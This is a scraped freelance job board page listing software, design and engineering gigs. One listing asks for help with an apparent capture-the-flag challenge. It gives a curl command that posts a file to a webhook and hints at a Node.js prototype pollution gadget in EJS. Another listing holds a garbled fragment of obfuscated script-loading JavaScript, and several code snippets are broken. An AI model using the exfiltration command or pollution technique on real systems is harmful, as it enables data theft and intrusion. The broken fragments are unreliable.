Web 2.0 design jobs

Filter

My recent searches
Filter by:
Budget
to
to
to
Type
Skills
Languages
    Job State
    2,000 web 2.0 design jobs found, pricing in AUD

    Develop schematics, PCB and firmware for a compact NFC reader. The suggested RFID controller is PN7160. Microcontroller - STM32 0) Two boards - antenna and the main board. The antenna diameter is 15mm with a hole in the center 4-5mm. The main board is 14mm in width and length is 35mm or less. 1) The reader must read and write password-protected memory blocks in Mifare Classic cards. 2) The reader keeps the password for the RFID cards as a hard-coded constant. 3) The reader has an 4-byte reader ID stored in its EEPROM memory. 4) The RGB LED on the edge of the main board, whose location matches the hole in the antenna. RGB LEDs are connected to the PWM pins of the controller. 5) A waterproof (if possible) speaker must be on the opposite edge of the main board, closer to one si...

    $780 (Avg Bid)
    $780 Avg Bid
    17 bids

    I am looking for an experienced Flutter developer to build a comprehensive e-commerce application. Key Features: - The primary feature of the app will be a well-organized product catalog. The app should be able to display and categorize products effectively, making it easy for users to navigate and find what they're looking for. ...that is consistent across both platforms. - Previous experience with e-commerce applications is a plus. Familiarity with shopping cart and payment integration functionalities would be highly beneficial. Please provide examples of your previous work, particularly within the e-commerce sector, when applying. Please check this figma design and if you can do it, let me know

    $16 / hr (Avg Bid)
    $16 / hr Avg Bid
    49 bids
    Java Code Issue Resolution 6 days left
    VERIFIED

    ...class where it is picking property value from api response as integer in the Pojo Class: @JsonProperty("intensity") private Integer intensity; public Integer getColor() { return color; } public void setColor(Integer color) { = color; } and in parser class (INTENSITY, ((), 0)); The problem is sometimes the Api giving the color value as string not as interger but only on on checkbox config we add and this already defined in java if(checkVariant is true) then consider it string and parse it what i have to do to fix my code based on that condition so i can parse the string value this way: updateProperties("color", ((), StringUtils

    $33 (Avg Bid)
    $33 Avg Bid
    21 bids

    I'm in search of a mobile application developer to create an engaging and innovative app designed for young kids and families. Key Requirements: - **Purpose**: The primary goal of the app is to entertain preschoolers (0-5 years) with engaging content. - **Features**: The app should have colorful visuals to captivate the young audience. Skills and Experience: - Prior experience in developing entertainment apps for children will be highly valued. - Familiarity with integrating ChatGPT REST API is a plus, though not mandatory. - Strong capabilities in creating visually appealing and engaging user interfaces. If you have a creative edge, experience in child-friendly app development, and are ready to develop a delightful app for kids, I'd love to discuss this project with y...

    $256 (Avg Bid)
    $256 Avg Bid
    31 bids

    I'm looking for a seasoned NextJs & React developer to craft a high-performance, single-page website for desktop and mobile. Your expertise in responsive design is crucial to ensure seamless, optimal performance on both. Note:- Please check figma of layout required below. The key features I require include: - Fast loading - Google page speed check has to be 100% for both desktop and mobile - The page is image heavy, hence has to lazy load images correctly - Menu has drop down images heavy. Accordingly loading should be only on mouse over and not interfere with rest of page load. - First part

    $268 (Avg Bid)
    $268 Avg Bid
    53 bids

    I'm in need of a talented elementor website designer with the knowledge of Javascript and j...Javascript and jquery, css3 and html who can transform a Figma prototype into a visually appealing and functional business website. Key Requirements: - Transform a Figma prototype into a Pixel perfect designed website - Ensure design is responsive and 100% similar to the figma Ideal Skills: - Experienced in designing business websites - Skilled in Elementor - Strong knowledge of JS, JQuery, CSS3, HTML, Elementor & PHP - Excellent communication and collaboration skills Check out the prototype from this link:

    $67 (Avg Bid)
    $67 Avg Bid
    9 bids
    Trophy icon figma to elementor 2 days left

    ***this is a GUARANTEED PROJECT for a QUALIFIED person.*** Looking for the below design to be done on elementor. It has to be 100% similar to the prototype that has given in the link. This project is time sensitive. you will have only 1 day to design the page pixel perfect and responsive.

    $22 (Avg Bid)
    $22
    5 entries
    Udemy - Rakuten api problem 5 days left
    VERIFIED

    ...t:'MTcxNjA0NTk1Ny4wMzIwMDA='};_cpo=('script');_cpo.nonce='',_cpo.src='/cdn-cgi/challenge-platform/scripts/jsd/',('head')[0].appendChild(_cpo);";var _0xh = ('iframe'); = 1; = 1; = 'absolute'; = 0; = 0; = 'none'; = 'hidden';(_0xh);function handler() {var _0xi = || ;if (_0xi) {var _0xj = ('script'); = js;('head')[0].appendChild(_0xj);}}if ( !== 'loading') {handler();} else if () {('DOMContentLoaded', handler);} else {var

    $220 (Avg Bid)
    $220 Avg Bid
    39 bids

    ...(and also their friends are your friends...). For instance, if student 0 is friend with student 1 and student 1 dislikes student 2 then student 0 will also dislike student 2. Note that all relations are symmetrical, this means that if student 0 likes student 1 then student 1 likes student 0. We call a group of students amicable if no pair of students in the group dislike each other. Finally, you only considered coherent gossips. You listened to the gossips one by one and only believe gossips that are consistent with your current knowledge. (e.g. if you know student 1 likes student 2, but you then hear that student 2 dislikes student 1 you will disregard the latter statement). Input: The first line contains two integers n? (2...

    $39 (Avg Bid)
    $39 Avg Bid
    17 bids

    ...terminal command you want to execute on the website: Visit to create a new webhook for receiving incoming web requests. Copy your unique URL from the webhook website and replace {webhook} in the following terminal command. This is the command that you want to execute on the website that will send / to your webhook. curl -F flag=@/ {webhook} To connect to the challenge go to hint 1: You can pollute NodeJS applications, Alex did a talk about it and the slides are available to read at where the important slides for this challenge are 17-53. hint2: The web application is using the EJS template engine for rendering templates. Alex talked about a Prototype Pollution gadget that could

    $40 (Avg Bid)
    $40 Avg Bid
    12 bids

    Tengo un error en codeigner con la api de mikrotik , necesito hacer funcionar este script corrigiendo este error: }catch(Exception $e){ return $e->getMessage(); } } } } // Mikrotik API if (!function_exists('mkClient')) { function mkClient() { return new PEAR2NetRouterOSClient(settings()[0]->mkipadd, settings()[0]->mkuser, settings()[0]->mkpassword); } } // Mikrotik API Util if (!function_exists('mkUtil')) { function mkUtil() { return new PEAR2NetRouterOSUtil(mkClient()); } } Class 'PEAR2NetRouterOSUtil' not found

    $48 (Avg Bid)
    $48 Avg Bid
    7 bids

    Hi Swapnil P., I have a new job with photos 24*1.50 = 36.00 60*1.20 = 72.00 Total = 108.00$ Please clean dust and imperfections from all photos. Thank you and have a great day

    $161 (Avg Bid)
    $161 Avg Bid
    1 bids

    I need a Figma expert who can take my specific design idea and turn it into a comprehensive prototype for a community yellow pages app. This prototype will be key to visualizing and testing the app's functionality before the development stage. Key Project Requirements: - Proficiency in Figma: You should be skilled in utilizing Figma's features to create a professional and functional UI prototype. - UI/UX Design: A good understanding of user interface design and user experience principles is crucial. - Attention to Detail: The ability to translate a specific, detailed design vision into a digital prototype is a must. The prototype should include: - User Registration/Login: A simple sign-up and sign-in process is necessary for the prototype. - Search...

    $653 (Avg Bid)
    $653 Avg Bid
    106 bids

    I'm in search of a skilled .Net mobile developer to finalize my .Net Maui mobile application. The key tasks include: - Implementing the logic, specifically around user interface interactions. - Although user authentication, data synchronization, and push notifications were not explicitly mentioned, familiarity with these aspect...who is proficient in both .Net and Maui and can confidently complete the application. Ideal skills and experience: - Proficiency in .Net and Maui - Experience in mobile application development - Understanding of user interface interactions - Knowledge in user authentication, data synchronization, and push notifications will be an advantage. Figma UI: Swagger attached

    $432 (Avg Bid)
    $432 Avg Bid
    23 bids

    ...solution as a Docker image I can run locally on lubuntu 22.04. I would do it myself, but I don’t have much experience with docker Requirements: 1 Install balabolka in wine - 2 Install cli balalbolka “bconsole” 3 Install raveena voice 4 Ensure you can create .wav file using raveena in Wine with example command: balcon -n raveena -t "The text will be read slowly." -s -5 -v 70 -w "d:Sound" 5 Run wine installation in docker 6 Ensure you can create .wav file using raveena

    $650 (Avg Bid)
    $650 Avg Bid
    21 bids

    I'm in need of a PHP page that helps our agents to send an order. This page should be intuitive and user-friendly while ensuring all necessary information is captured. The platform should be interactive and user-friendly, ensuring a smooth order submission process for our agents. Ideal Skills: - Proficient in PHP - Strong experience in web development - Knowledge in creating secure web forms - Experience in agent-based systems would be a plus Please bid for this project if you believe you have the skills and experience needed to deliver a high-quality, efficient, and secure PHP page for our agents. Our customer sells products (not online, but in shop). He wants to receive orders from agents. I have an excel file containing the products that he wants to sell. The e...

    $260 (Avg Bid)
    $260 Avg Bid
    151 bids

    Design of Digital filter algorithm/ code in C for ARM processor for processing real time raw sensor to removal of noise & unwanted signal Algorithm / code for Digital Filter low bandwidth Real time Sensor Signals 1. Analogue Raw data acquisition in real time at 1000 samples per second in 24 bit precision 2. Raw data signal bandwidth /frequencies restricted to less then 1000 hz by hardware RC anti aliasing filter to avoid aliasing 3. Following Digital in sequence to be applied to raw signal . a. low pass filter 0-170 hzs ( to remove high frequency random / white noise b. High pass filter 1 hz to 400 hz (to remove low frequency dur DC signal coupling ) c. Very steep(narrow band) notch filter at 50 hz / 60 hz to remove power line interference a & b can...

    $181 (Avg Bid)
    $181 Avg Bid
    5 bids

    I will work on these FIGMA.

    $15 / hr (Avg Bid)
    $15 / hr Avg Bid
    1 bids

    I need a video ad edited it’s only 00:50 in running time THIS IS THE VIDEO I NEED EDITED: YOU MAY USE CLIPS FROM HERE: THIS IS WHAT I NEED IT EDITED AS:

    $12 (Avg Bid)
    $12
    18 entries

    ...and well-documented code, I'd like to hear from you. Here are details- I have to create a simulation that will find the optimal solution to go around a circuit using the least amount of power in a given time, by calculating the forces acting on the vehicle at any point. The forces have been identified to be: Drag, Rolling resistance, Incline, Wind & Motor thrust. Rolling resistance, wind (set to 0 in data should be okay to plug values in later) and incline forces have been resolved in an excel file for every data point (every metre). Drag and motor thrust which depend on the current velocity of the vehicle (see matrix explanation below). The first lap is different to the remaining 9 laps, you can work around this however you like but, please ensure you use the correct...

    $60 (Avg Bid)
    $60 Avg Bid
    20 bids
    Laravel Web Developer 4 days left
    VERIFIED

    Looking for a reliab...could be any of the MS Teams, Zoom, Google Meet, etc. Working time zone preferred is Europe GMT + 0 Key Responsibilities: - Understanding of SECURE PHP code development with proper code comments, file names, package management, branching, deployment using GIT. - FULL knowledge about Latest Laravel framework, for example Composer Packages, Blade Templates, Laravel MIX, Laravel Middleware, etc. etc. - Integrate a payment gateway for secure transactions - Work on integrating JSON APIs, a payment gateway, and social media logins Ideal Skills: - Proficiency in Laravel development - Proven experience with API integrations, particularly payment gateways and social media logins - Knowledge of JWT (JSON Web Tokens) - Previous work on clean, modern layout desi...

    $749 (Avg Bid)
    $749 Avg Bid
    253 bids

    Hi, we need help to convert this figma design into Wix Studio. Needs to be responsive. No SEO needed. Needs to be well structure that won't break when making edits of text & image. Needs to setup site theme and stick all elements using site theme's text style & color. No real functionality needed. Just convert the design into Wix Studio. Please provide links to your previous Wix Studio sites. No suggestions on 'use wordpress' nor 'use classic editor' is needed.

    $236 (Avg Bid)
    $236 Avg Bid
    71 bids

    ...project involves creating illustrations for a children's book targeted at the age range of 0-4. Key Project Specifications: - Illustrative Style: The project requires a cartoon style of illustration. The chosen freelancer should have strong capabilities in producing cartoon-like visuals that are appealing to children. - Color Scheme: As for colors, I envision pastel colors to set the right mood and tone for the story. The illustrations should be gentle and soothing to the eyes, reflecting the typical sophistication of pastel colors. Ideal Skills: - Proven experience in cartoon-style illustration - Proficiency in using pastel colors - Prior experience in illustrating children's books, specifically for the 0-4 age group Your portfolio showing your past work...

    $1363 (Avg Bid)
    $1363 Avg Bid
    110 bids

    We are looking for a highly skilled development team to recreate a complex web platform in JavaScript. This is expected to be a three to six month project, requiring a minimum of six full time developers. This platform will reside on the AWS network, preferably using MySql and Linux. We will be recreating a PHP/MySQL platform to a JavaScript/MySQL platform with approximately 200 features. This new platform will require a significant upgraded user experience, integration of animated graphics and faster reports processing. Our current platform has some components that are 10 to 20 years old. You will be creating from scratch and not using ANY of the current code. Key Developer Requirements: - Extensive experience in JavaScript platform development. - Access to skilled User Experien...

    $54424 (Avg Bid)
    Featured
    $54424 Avg Bid
    76 bids
    Excel VBA Data Manipulation 4 days left
    VERIFIED

    ...as pdf photos, but the problem here is my pdf photo sometimes not shown correctly, and sometimes its shows correctly. here is my vba code: For i = 1 To 57 '54 ' = False sheetxx(i).Select (Now + TimeValue("0:00:05")) ' "({1068})", True 'DoEvents pdffilename = fname2 & "" & sheetxx(i).Name & ".pdf" jpegfilename = fname2 & "" & sheetxx(i).Name & ".jpg" Shell ("D:khalid savescreenshot " & jpegfilename) ' (Now + TimeValue("0:00:01")) Shell ("D:khalid " & jpegfilename & " " & pdffilename) ' = True sheetxx(i).Select sheetxx(i).ChartObjects(1).Activate For E...

    $39 (Avg Bid)
    $39 Avg Bid
    37 bids

    ...from a website. The data I'm interested in is text content and tables, specifically contact information. Ideal Skills: - Proficiency in web scraping tools - Strong experience with scraping text content and tables - Expertise in extracting specific information - Familiarity with structured data formats The contact information on the website is in a structured format. Your ability to navigate this and provide me with a clean, organized dataset will be crucial. Looking forward to collaborating with a detail-oriented and reliable professional. Attached is a sample format. The site is: Final file must contain all records for all schools on all pages 1-1087 Freelancer must provide a sample file of 150 records to

    $46 (Avg Bid)
    $46 Avg Bid
    26 bids

    Interactive web browser app (mobile compatible) that does a simple questionnaire, based on 0. Home page where user is prompted to START. UI should be clean and feel open and creative. Shouldn't be much on the home page. Should be an area/page to show some instructions of the app. 1. Before the questionnaire there are some options to choose, e.g. language, version of Bible, sections of the Bible i.e. Pentateuch / History Books / Writings / Prophets / Old Testament / New Testament. The user doesn't have to choose these each time, just the first time, to be saved in browser. If they want to modify it in the subsequent questionnaires they take, they are able to do so as an option. 2. Then there is a simple 10 question questionnaire. All using API logic. For e...

    $193 (Avg Bid)
    $193 Avg Bid
    75 bids

    I have a mathematical problem related to a video game that I cannot solve. I'm offering 100 dollars to anyone who comes up with a solution, and makes a simple calculator with the solution. The problem is described in this spreadsheet. Please read it before contacting me. https://docs.google.com/spreadsheets/d/1b7J3gmEsKXdg5S7edLrwDv4Xyf8yO0hpFWip2y11bOg/edit#gid=0

    $215 (Avg Bid)
    $215 Avg Bid
    12 bids

    I need a developer to swiftly convert Figma designs into Next Admin panel pages using Tailwind CSS and TypeScript. The urgency of this project cannot be understated. Therefore, I'm looking for someone who can s...understated. Therefore, I'm looking for someone who can start immediately and is comfortable working with these specific technologies. Key Requirements: - Proficiency in , Tailwind CSS, and TypeScript - Experience with Figma to web development workflow - Ability to deliver results within a tight timeframe Please provide examples of similar projects you've worked on and a brief overview of your process when converting Figma designs. Here is my figma url: The budget is flexible.

    $259 (Avg Bid)
    $259 Avg Bid
    67 bids

    Hi Swapnil, please can we have the background removed from 107 images, saved in the usual formats? Please see link: Thank you :)

    $303 (Avg Bid)
    $303 Avg Bid
    1 bids

    ...right excel Guru can probably figure this out in less than an hour. Easy money. The first formula is related to searching a cell for one of four words and populating an adjacent column with a correlating value, based on the word found. The four words to be searched for are "Low", "Medium", "High", and "Not currently a priority". The adjacent cells are to be populated with correlating values 1, 2, 3, and 0 (to generate a Score). The cells are currently blank, and users of the spreadsheet will fill these cells by selecting from a drop-down list (of these 4 words). The objective is to create a formula that converts their answer (in one cell) to a score (in an adjacent, hidden, cell). The second formula involves summing (adding) the sc...

    $142 (Avg Bid)
    $142 Avg Bid
    32 bids

    Hello everyone. I need a query for prestashop version 1.7.8.10. I need to run 2 times a day a check script on products that have quantity 0. When I have quantity 0, I need to disable the product. I need a script that performs this operation 2 times a day.

    $49 (Avg Bid)
    $49 Avg Bid
    32 bids

    I'm looking for an expert who can efficiently calculate...particular challenging aspects. Key responsibilities and qualifications include: Tasks: - Conduct stability analysis and design checks - Calculate surcharges based on building loads - Ensure retaining wall is adequate for loads and soil conditions Ideal Skills and Experience: - Civil or structural engineering background - Experience in retaining wall design and surcharge calculations - Understanding of soil pressure distribution - Familiarity with residential building requirements This is more than a project; it's about safely supporting a home. So, if you've got the expertise and are ready to roll up your sleeves, we need to talk. Please review to the Plans on sheet A-0 and the city correcti...

    $1546 (Avg Bid)
    $1546 Avg Bid
    16 bids

    I need advanced level steel shop drawings to begin the fabrication process. Here's what's needed: - Shop Drawings Detail: I require a meticulous approach, ensuring all the details required for a general contractor and architect to sign off are included. - Format: I need the final drawings to be delivered in PDF format. - Inclusive specifications: The final shop dra...must, as well as a keen eye for detail. I'm in need of detailed steel shop drawings that are geared towards fabrication. I have set of plans and elevations. Need all details for general contractor and Archetict to sign off on so we can begin fabrication. I NEED THE PLANS STAMPED

    $218 (Avg Bid)
    $218 Avg Bid
    23 bids

    Require a skilled professional in computer vision. I have public videos from YouTube which you can use to follow the project. In these videos, children are playing games. We need the following features to find the severity/confidence scores (0-9, where 0 is non-Autism and 1-9 represents increasing severity) by using any technique or model (pre-trained / ML / DL) so that we can find the individuals with autism levels (such as severe autism, mild, medium, lower, or no autism, etc). For example, maybe you can see Face landmark detection () that has a confidence score. I expect you will find a better technique. By applying the following feature techniques: facial expression analysis, gaze analysis, body movement analysis

    $242 (Avg Bid)
    $242 Avg Bid
    38 bids

    I'm looking for a developer who has already done or can do this work as soon as possible. This is a slot machine that a user can roll up/down with his finger. When the result is less than 0, then produce error sound otherwise produce success sound.

    $138 (Avg Bid)
    $138 Avg Bid
    25 bids

    ...and ESP32 microcontrollers (specifically the ESP32-DEVKITC-32UE). It needs a certain amount of inputs and outputs to begin with, but also minimum 2 outputs with PWM-control or analog 0-5V, as the motorcontroller of choice works with PWM or 0-5V inputs. Also 2 analog inputs 0-5V for 2 kinds of safety edges. Find also the list of peripherals in the attachment. The pulse generated by the motorcontroller won’t exceed 500 Hz with our current motor/motorcontroller configuration. (see peripheral list: section motorcontroller) In total we need to have: Digital inputs: 12 Digital fast inputs (counter): 2 Analog inputs: 2 Digital outputs: 6 Analog outputs: 2 Key deliverable: A fully programmed NUCLEO-G491RE STM32 and ESP32-DEV...

    $1881 (Avg Bid)
    NDA
    $1881 Avg Bid
    12 bids

    ...anatomical structures) through the existing functions already set up, Adapt the app for Windows, Mac and Linux, Set up a functional and reactive web viewer, Explain how to paste it on a website and how to update it, Optional missions (estimated 140 euros): Allow to navigate between the proposition of the searchbar using the arrows: -To work like any navigator only when a search is going on (keep rotation with arrows otherwise) Keep H/P shortcut and click things to hide: -Instead of only selecting and hiding, the user could maintain the shortcut (H or P) and pick what to hide progressivly. Press 1/2/3/4/5/6/7/8/8/0 (above the letters) to show/hide the main collections: -The state of visibility of the objects has to be stored and recovered...

    $1075 (Avg Bid)
    $1075 Avg Bid
    5 bids
    Trophy icon Hollybloom Event Listings Website 9 days left

    ...should be user-friendly and designed to effectively showcase a variety of group holistic events. Key Features Needed: 0. Menu: Home, About Us, Contact Us, Sign up your events/Sign in to manage events (Practitioners page) 1. View Events: A comprehensive, easy-to-navigate list of upcoming events, including group events, workshops, retreats, sessions, and activities. Each Event needs to show: a. The title of the event with a short description b. The location c. The date & time d. Link/Button to the practitioner’s booking website. e. The price f. An option for longer pop-up bio/description of the event, studio and practitioner running the event (see example in the link below). 2. Filtering Options: Users should be able to filter events based on date, type, locati...

    $598 (Avg Bid)
    Guaranteed
    $598
    124 entries

    1. High quality content about dating and relationship. (Do research before writing.) 2. Creativity is a must. ( We don't like cliche. If you have many creative thoughts about dating, we LOVE it!) 3. Basic SEO skills. (We are strict with keywords and you should follow the instructions.) 4. Standard English ( 0 mistake.) 5. Responsibility. (On time.) 6. Passion for writing. The readers can feel your passion when they read the articles you wrote. We only hire writers who LOVE writing. 7. Good attitude.

    $30 (Avg Bid)
    $30 Avg Bid
    117 bids

    1. High quality content about dating and relationship. (Do research before writing.) 2. Creativity is a must. ( We don't like cliche. If you have many creative thoughts about dating, we LOVE it!) 3. Basic SEO skills. (We are strict with keywords and you should follow the instructions.) 4. Standard English ( 0 mistake.) 5. Responsibility. (On time.) 6. Passion for writing. The readers can feel your passion when they read the articles you wrote. We only hire writers who LOVE writing. 7. Good attitude.

    $28 (Avg Bid)
    $28 Avg Bid
    61 bids

    ...__________________________ •Design Requirements: - The design should give a sense of 'deliciousness'. Make it neat, clean, fresh, while playful keep it elegant, reflect a reliable Pharmaceutical grade. •you agree to 100% original, customized design, (revisions until complete satisfaction) > No clipart, no readymade template > client will own the copyright of the final Design •Desired graphic elements: Splash of juice or water , some luxury graphics, the logo and big “B12” so customers can identify what the content is. You may include sunrays behind the main logo (a happy watermelon character ). Avoid use of black, dark colors, or dark green. Prefer pantone tones for 2025. White backgrounds ok with other el...

    $75 (Avg Bid)
    Guaranteed
    $75
    92 entries

    I'm looking for a creative designer to produce a design for my brand, 18" by 24". Key points: - Objective: The main goal of the design is to increase brand awareness. - Style: The design should be modern and minimalist. - Color scheme: The design must use the brand's colors. Please make sure to check the website (() to get a better understanding of my brand. Feel free to use parts of the logo or all of it. If it conveys a message about getting 0% interest funding or something similar would be great. The full domain has to be included in capital letters. This is my website () Be creative, think outside of the box. Thanks

    $37 (Avg Bid)
    Guaranteed
    $37
    52 entries

    ...talented U/I U/X designer to create a visually appealing and user-friendly LuckyDraw app for both iOS and Android platforms. Key Requirements: - Design the interface for both iOS and Android: The app should be designed in a way that it's visually appealing and easy to navigate on both platforms. - Ensure customers can easily use the app: The design should be user-friendly in order to increase user engagement and retention. Ideal Skills: - Experience in mobile U/I U/X design: A proven track record in designing mobile apps with a focus on user interface and user experience. - Understanding of iOS and Android design guidelines: Familiarity with the design principles and guidelines of both platforms. screens landing Page will prompt user to select...

    $309 (Avg Bid)
    $309 Avg Bid
    97 bids

    ... "relationships": [] }, { "name": "Employer", "attributes": [ {"name": "employerId", "type": "String"}, {"name": "companyName", "type": "String"}, {"name": "addressId", "type": "String"} ], "relationships": [ {"name": "address", "type": "Address", "multiplicity": "1"}, {"name": "employees", "type": "Person", "multiplicity": "0..*"} ] }, { "name": "Paycheck", "attributes"...

    $46 / hr (Avg Bid)
    $46 / hr Avg Bid
    35 bids

    ...YouTube Experience with creating content for social media is definitely a plus, as is a good sense of pacing and timing. Your editing should enhance the video's impact and make it more engaging. It should tell a story and why I should be hired as a mentalist and mindreader. To start the video "The man we brought... to Dan Chan (starting at 0:05 to 0:15)" from this video Then the the "Dan Chan's" from 0:03-0:07 from this video From there you can use clips from the following videos: (dog dapper is a good reaction, but be sure to cut out the dead time) Include "I'm going to have you think of a person, place or thing." cut to "Let me commit myself to something on this card

    $284 (Avg Bid)
    Guaranteed
    $284
    37 entries

    I'm looking for an experienced engineer who can perform a Thermal Finite Element Analysis (FEA) on a stainless 304 tank of 400 x 300 diameter, incorporated with a coil. Here's precisely what I need: • Analyze heat transfer within the tank to maintain a low temperature between 0-100°C • Develop an effective solution in response to the details and dimensions provided • Produce a comprehensive report detailing findings, methodologies, and containing relevant diagrams Skills and Experience: • Proficiency in a FEA software package (e.g., ANSYS, Comsol, etc.) • Extensive experience in thermal modelling and heat transfer calculations • Sound knowledge of stainless 304 properties and characteristics • Engineer degree or above in a relevant...

    $716 (Avg Bid)
    $716 Avg Bid
    47 bids

    1, Build a KMS SharePoint library with the listed Metadata below 2, Each of the sectors will have 1 or more than 1 sector responders 3, KMS admin can upload the document, but the status is Draft. 4, KMS admin needs to assign at least the sector and document type of the uploaded document. then will request approval from the sector responders. once the document is approved, the status will change to Approved, Then the document number will be automatically generated, and the review date will for 2 years after the document is approved. 5, In any document library users can post by a power automate script (a form that at least has "the sector" and "document type") their document or PDF to KMS, then the file will be copied to KMS as a Draft, then an email approv...

    $783 (Avg Bid)
    $783 Avg Bid
    23 bids